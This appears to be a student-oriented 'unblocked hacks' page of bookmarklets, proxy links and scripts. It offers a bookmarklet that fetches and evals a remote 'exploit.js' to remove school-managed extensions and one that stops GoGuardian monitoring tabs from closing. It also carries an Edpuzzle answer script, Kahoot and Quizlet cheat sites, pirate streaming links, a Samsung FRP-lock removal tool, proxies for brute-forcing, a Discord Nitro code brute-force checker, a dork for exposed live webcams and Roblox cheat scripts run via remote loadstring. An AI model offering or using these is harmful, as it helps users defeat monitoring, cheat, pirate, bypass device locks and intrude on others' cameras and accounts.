Cloaking Tabs
Create new bookmark & paste this code as url, then name the bookmark google
javascript:(function () {document.title=prompt('Tab Cloak\n\nEnter new Tab Title:');var icon=document.querySelector ('link[rel="icon"]');switch(prompt('Choose new tab icon:\n\n[1] Google Search\n[2] Google Drive\n[3] Custom URL')) {case'1':icon.setAttribute('href','https://www.google.com/favicon.ico');break;case'2':icon.setAttribute ('href','https://ssl.gstatic.com/images/branding/product/2x/hh_drive_96dp.png');break;case'3':icon.setAttribute ('href',prompt('Enter Custom Tab Icon URL:'))}})()
Remove Youtube Ads & Restricted Mode
Create new bookmark & paste this code as url, then use when on youtube.com
javascript:(function () {if (window.location.toString().includes('www.youtube.com/watch?v%27))%20{%20window.open(%27https://www.youtube-nocookie.com/embed/%27%20+%20window.location.toString().split(%27=%27)[1])%20}})()
Block Goguardian tab closing
Create new bookmark & paste this code as url, then name the bookmark whatever, stops teacher from closing guguardian tabs
javascript:(function () {window.onbeforeunload = function() { return 1; };})()
HTML Goggles
Allows you to edit the Raw HTMl of a Website.
javascript:(function () {var script=document.createElement('script');script.src='https://x-ray-goggles.mouse.org/webxray.js';script.className='webxray';script.setAttribute('data-lang','en-US');script.setAttribute('data-baseuri','https://x-ray-goggles.mouse.org');document.body.appendChild(script);}())
Extension Remover
First, go to chrome.google.com/webstorex then press this bookmarklet.
javascript:fetch(`https://compactcow.com/ltbeef/exploit.js`).then(data=>{data.text().then(text=>{eval(text)})});
Developer Console
Turn into bookmark, paste code as url, check bottom right of screen.
javascript:(function () { var script = document.createElement('script'); script.src="//cdn.jsdelivr.net/npm/eruda"; document.body.appendChild(script); script.onload = function () { eruda.init() } })();
About:Blank Tab Custom link
Turn code into bookmark, type link but MUST allow popups to create tab.
javascript: (function () {var url = prompt("Paste the link you want to be embedded into an about:blank page.\n(INCLUDE https://)", "LINK HERE"); var urlObj = new window.URL(window.location.href); win = window.open(); win.document.body.style.margin = "0"; win.document.body.style.height = "100vh"; var iframe = win.document.createElement("iframe"); iframe.style.border = "none"; iframe.style.width = "100%"; iframe.style.height = "100%"; iframe.style.margin = "0"; iframe.referrerpolicy = "no-referrer"; iframe.allow = "fullscreen"; iframe.src = url.toString(); win.document.body.appendChild(iframe); })();
History Flooder
Whatever Tab your Currently on, will be put into your history your desired number of times.
javascript:var num=prompt("History flood amount:");done=false;x=window.location.href;for (var i=1; i<=num; i++){history.pushState(0,
0, i==num?x:i.toString());if(i==num){done=true}}if(done===true){alert("History flood successful!
"+window.location.href+" now appears in your history "+num+(num==1?" time.":" times."))}
Chromium browser (Completely Unblocked everything)
Visit the project (created by us!) and click run to freely browse the web
https://replit.com/@Infray/important-school-work
Bookmark Autoclicker (100cps)
Create new bookmark & paste this code as url, then run the bookmark and click where u want to autoclick
javascript:var DELAY = 1;var autoClickerStyleElement = document.createElement("style");autoClickerStyleElement.innerHTML="*{cursor: crosshair !important;}";document.body.appendChild(autoClickerStyleElement);function addClicker(e) {if(!e.isTrusted) {return;}if(e.target.classList.contains("auto-clicker-target")) {e.target.classList.remove("auto-clicker-target");} else {e.target.classList.add("auto-clicker-target");}document.body.removeChild(autoClickerStyleElement);document.body.removeEventListener("click", addClicker);e.preventDefault();autoClick(e.target);}function autoClick(element) {if(element.classList.contains("auto-clicker-target")) {element.click();setTimeout(function(){ autoClick(element); }, DELAY);}}document.body.addEventListener("click", addClicker, 0);
PHPRXXY
Visit the link for unrestricted web-access
https://www.rateavon.je/error.php
Editable Page
Copy code and paste as bookmark url to make page editable
javascript:document.body.contentEditable = 'true'; document.designMode='on'; void 0
Non-Editable Page
Revert back to normal page to hide that you edited anything
javascript:document.body.contentEditable = 'false'; document.designMode='off'; void 0
Youtube Alternatives
these links have all the youtube videos hosted elsewhere
invidious.weblibre.org
yewtu.be
y.com.sb
vid.puffyan.us
inv.riverside.rocks (recommended)
invidious.kavin.rocks
invidious.namazso.eu
youtube.076.ne.jp
tube.cthd.icu
Reddit Mirror
Unblocked reddit interface
https://libreddit.spike.codes/
Kick-Asteroids
Spawn a rocket ship you can control with WASD & shoot with SPACE, you can shoot words on poage for points.
javascript:var%20KICKASSVERSION='2.0';var%20s%20=%20document.createElement
('script');s.type='text/javascript';document.body.appendChild(s);s.src=
'//hi.kickassapp.com/kickass.js';void(0);
Whatfont?
Clicking this bookmark, then the font you want to select will show font name, size & more details about the font
javascript:(function(){var d=document,s=d.createElement('scr'+'ipt'),b=d.body,l=d.location;s.setAttribute('src','http://chengyinliu.com/wf.js?o='+encodeURIComponent(l.href)+'&t='+(new Date().getTime()));b.appendChild(s)})();
Prxxys
We have cloaked these to blank pages so they dont show urls or blockable text
Ph Prxxy
Holy Unblxcker
Ludicrous Prxxy
Nebula Prxxy
RammerHead Prxxy
Kahoot Hack Sites
These sites will help you win kahoot games
https://kahoot.rocks/
https://pxtrez.com/kahoot (recommended)
Edpuzzle Answers & Skip Video
Must allow popups, use bookmarklet on page of your edpuzzle.
javascript: fetch("https://cdn.jsdelivr.net/gh/ading2210/edpuzzle-answers@latest/script.js").then(r => r.text()).then(r => eval(r))
Quizlet Hack Sites
These sites will let you cheat for answers on quizlet games.
https://schoolcheats.net/quizlet/
https://gist.github.com/theonlytruegod/1d61841f3294f419bbe8b800143deba1
Google Snake Addon
Search "Google Snake" on google, click play, then paste this code into a bookmark url and click it.
javascript: req = new XMLHttpRequest(); req.open('GET', 'https://raw.githubusercontent.com/DarkSnakeGang/GoogleSnakeCustomMenuStuff/main/custom.js'); req.onload = function() { eval(this.responseText + 'snake.more_menu();'); }; req.send();
Idle Breakout Infinite Money
Copy and paste this into the "import" box on idle breakout.
MTgzNixJbmZpbml0eSxJbmZpbml0eSwyMTcsMCwxNjUyNTgsMTY1MjU4LDgxMTMyLDUsMSwxLDEsMSwwLDQzN
Tk1Ljc4LDQ2ODE1MTM5LDAsMCwwLDAsMCwwLDAsMCwwLDAsMTkzODc1Njg1MCwxOTM4NzU2ODUwL
DAsMCwwLDAsMCwxMDAwLDAsMCwwLDAsMCwwLDAsMCwwLDAsMCwwLDAsNSwyNTUsMCwzMywwLDEwLD
ksMTY0LDQsOTUsMCwwLDAsMCwwLDEsMCwwLDAsMSwxLDEsMCwwLDAsMCwwLDEsMSwxLDEsMCwxLDEsMSwxLDAsMSwxLD
EsMSwwLDEsMSwxLDEsMCwxLDEsMSwxLDAsMSwxLDEsMSwwLEluZmluaXR5LDAsMCwwLDEsSW5maW5pdHksMSwwLDAs
Idle Breakout level 260464
Goes to level 260464, no balls purchased, no upgrades, no skill points, a lot of money
MjYwNDY0LDFlKzMwMixJbmZpbml0eSw0MDE4NywwLDE1MjY0NTkzLDE1MjY0NTkzLDc2
Random live webcams
by pasting this code into the address bar you will be met with multiple random cameras broadcasting their footage online
intitle:"webcamxp 5" intext: "live stream"
SamFW FRP Tool
This tool can remove FRP, Google account lock, Password lock, and more from Samsung Phones.
https://androidfilehost.com/?fid=15664248565197204837
Prxxy's for Bruteforcing
Use for bruteforcing inside checkers or generators.
https://irunblocked.com/Proxies/23696.txt
https://irunblocked.com/Proxies/2377.txt
Free m0vie & tv streaming sites
These sites help you watch m0vies for free! (some sites may go down without notice)
onionplay.se
Fmovies.to
soap2day.to
moviesjoy.to
moviesjoy.plus (recommended)
gomovies.sx
movieninja.online
movieninja.live
sflix.to
123movies.com
Fmovies.app
theputlocker.me
soap2day.ac
soap2day.sh
soap2day.mx
s2dfree.to
s2dfree.cc
s2dfree.de
s2dfree.is
s2dfree.nl
123moviesgo.ac
Google Drive m0vie stashes
Pasting this search term into the address bar will let you find tons of google drive m0vies!
site:drive.google.com movies
Fake Virus
This makes your screen spin, change color, play sounds, and have a odd cursor but you can refresh to undo.
https://github.com/xploitspeeds/Bookmarklet-Hacks-For-School/blob/main/Troll%20Bookmarklet%20%5BDOES%20LAG!%5D
Nitro gen python script
to run this you need: import the py requests library, make a .txt file name it Nitro Codes.txt,
then make another named Valid Codes.txt, finally make a .py script
and name it main.py, and but all 3 into a folder, then run inside of terminal.
import requests import random import string import time print(""" NITRO GEN + CHECKER | """) time.sleep(2) print("GET YOUR VALID NITROS AT VALID CODES.TXT") time.sleep(0.3) print("MADE BY INFRAY\n\n") time.sleep(0.2) num = int(input('HOW MANY CODES YOU WANT : ')) with open("Nitro Codes.txt", "w", encoding='utf-8') as file: print("STATUS : OK") start = time.time() for i in range(num): code = "".join(random.choices( string.ascii_uppercase + string.digits + string.ascii_lowercase, k = 16 )) file.write(f"https://discord.gift/{code}\n") print(f"GENERATED {num} CODES | TIME TAKEN : {time.time() - start}\n") with open("Nitro Codes.txt") as file: for line in file.readlines(): nitro = line.strip("\n") url = "https://discordapp.com/api/v6/entitlements/gift-codes/" + nitro + "?with_application=false&with_subscription_plan=true" r = requests.get(url) if r.status_code == 200: print(f" Valid | {nitro} ") break else: print(f" Invalid | {nitro} ") input("\nCHECK VALID CODES.TXT FOR VALID CODES")
ROBLOX Bitcoin Miner Script
this link has hacks for bitcoin miner (Executor needed)
loadstring(game:HttpGet("https://raw.githubusercontent.com/Xv3nm/lua-rblx-repo/main/Projects/CryptoKingpin"))()
ROBLOX Evade OP Blox Fruits Script
this link has hacks for blox fruits (Executor needed)
https://bit.ly/3RGAZZl
ROBLOX Chat Bypas Script
this script lets you bypass roblox chat filters, press Q to activate. (Executor Needed)
_G.Keybind = 'Q' -- This is usually defaulted to Q. However, you can change to whatever you want. _G.Method = 1 -- 1 for the new method, 2 for the emoji method. If not defined, it will be defaulted to 1. loadstring(game:HttpGet("https://raw.githubusercontent.com/synnyyy/synergy/additional/betterbypasser",true))()
ROBLOX Anime Fighting Simulator Auto-Farm Script
this script lets you autofarm inside anime fighting simulator. (Executor needed)
loadstring(game:HttpGet("https://raw.githubusercontent.com/Jaaaaay2/MahScriptHub/master/AFS%20Remastered"))()
ROBLOX Anime Fighting Simulator Infinite Yen Script
this script lets you obtain infinite yen inside anime fighting simulator. (Executor needed)
loadstring(game:HttpGet("https://raw.githubusercontent.com/scriptpastebin/raw/main/animefightingsimulator%22))()
ROBLOX Arsenal Aimbot Hacks Script
this script lets you have aimbot and other various hacks in arsenal. (Executor needed)
loadstring(game:HttpGet("https://raw.githubusercontent.com/xHeptc/Kavo-UI-Library/main/source.lua"))()